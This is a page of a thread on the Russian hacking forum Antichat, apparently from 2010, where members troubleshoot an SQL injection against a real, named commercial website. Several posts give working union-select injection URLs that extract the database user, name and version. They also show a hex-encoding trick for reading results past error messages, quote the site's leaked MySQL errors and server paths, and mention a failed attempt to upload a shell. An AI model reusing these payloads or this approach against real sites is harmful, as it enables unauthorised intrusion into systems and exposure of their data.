HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1215 из 2438 « Первая < 215715111511651205 1211 1212 1213 1214 1215 1216 1217 1218 1219 12251265131517152215 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #12141  
Старый 24.03.2010, 20:26
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию
Цитата:
Сообщение от 547  
ну на самом деле можно попробовать еще вот этот способ...

http://forum.antichat.ru/threadnav43966-4-10.html
нет не получаеться
 
Ответить с цитированием

  #12142  
Старый 24.03.2010, 20:58
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами: 8728261

Репутация: 211
По умолчанию
Цитата:
Сообщение от LokbatanLi  
нет не получаеться
покажи как ты пробовал?
 
Ответить с цитированием

  #12143  
Старый 24.03.2010, 21:22
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию
даje не моq пробовать..
 
Ответить с цитированием

  #12144  
Старый 24.03.2010, 22:06
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию
Цитата:
Почему user() иногда возвращает кавычку?
Выложи ссыль.
 
Ответить с цитированием

  #12145  
Старый 24.03.2010, 22:36
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
С нами: 9351139

Репутация: 1593


По умолчанию
Цитата:
Сообщение от CyberHunter  
Выложи ссыль.
Код:
http://www.vales.by/catalog.php?action=show_object&id=109+union+select+concat_ws(0x3a,user(),database(),version())--
 
Ответить с цитированием

  #12146  
Старый 24.03.2010, 22:42
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
Цитата:
Сообщение от root_sashok  
Код:
http://www.vales.by/catalog.php?action=show_object&id=109+union+select+concat_ws(0x3a,user(),database(),version())--
Здесь юзер valesby@localhost и никакой кавычки. С чего ты взял, что там кавычка?
 
Ответить с цитированием

  #12147  
Старый 24.03.2010, 23:02
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию
Код:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/common/common_scripts.php  on line 26
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@localhost:valesby:5.0.90' at line 4
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/catalog.php on line 155
The used SELECT statements have a different number of columns
Здесь просто имя юзера после локалхост пишет.
 
Ответить с цитированием

  #12148  
Старый 24.03.2010, 23:10
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
С нами: 9351139

Репутация: 1593


По умолчанию
Все, разобрался, это value в кавычках. Спасибо.
 
Ответить с цитированием

  #12149  
Старый 24.03.2010, 23:12
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
Цитата:
Сообщение от CyberHunter  
Код:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/common/common_scripts.php  on line 26
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@localhost:valesby:5.0.90' at line 4
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/catalog.php on line 155
The used SELECT statements have a different number of columns
Здесь просто имя юзера после локалхост пишет.
Улыбнуло

Поясню: на странице идет два запроса. В первом - SQL-инъекция, дальше идет второй запрос, в котором используются данные от первого. MySQL ругается на символ '@', поэтому показывает только от этого символа.

Делаем запрос:
Код:
http://www.vales.by/catalog.php?action=show_object&id=109+union+select+hex(concat_ws(0x3a,user(),database(),version()))
Получаем:
Код:
76616C65736279406C6F63616C686F73743A76616C657362793A352E302E3930
Что в HEX:
Код:
valesby@localhost:valesby:5.0.90
Тоесть
Код:
имя_юзера:БД:версия
Проявляем смекалку и нестандартное мышление, товарищи...
Последний раз редактировалось mailbrush; 24.03.2010 в 23:15..
 
Ответить с цитированием

  #12150  
Старый 24.03.2010, 23:34
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами: 8854580

Репутация: 34
По умолчанию
там phpbb - форум
прав не хватает... шелл не залить
 
Ответить с цитированием
Ответ
Страница 1215 из 2438 « Первая < 215715111511651205 1211 1212 1213 1214 1215 1216 1217 1218 1219 12251265131517152215 > Последняя »



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.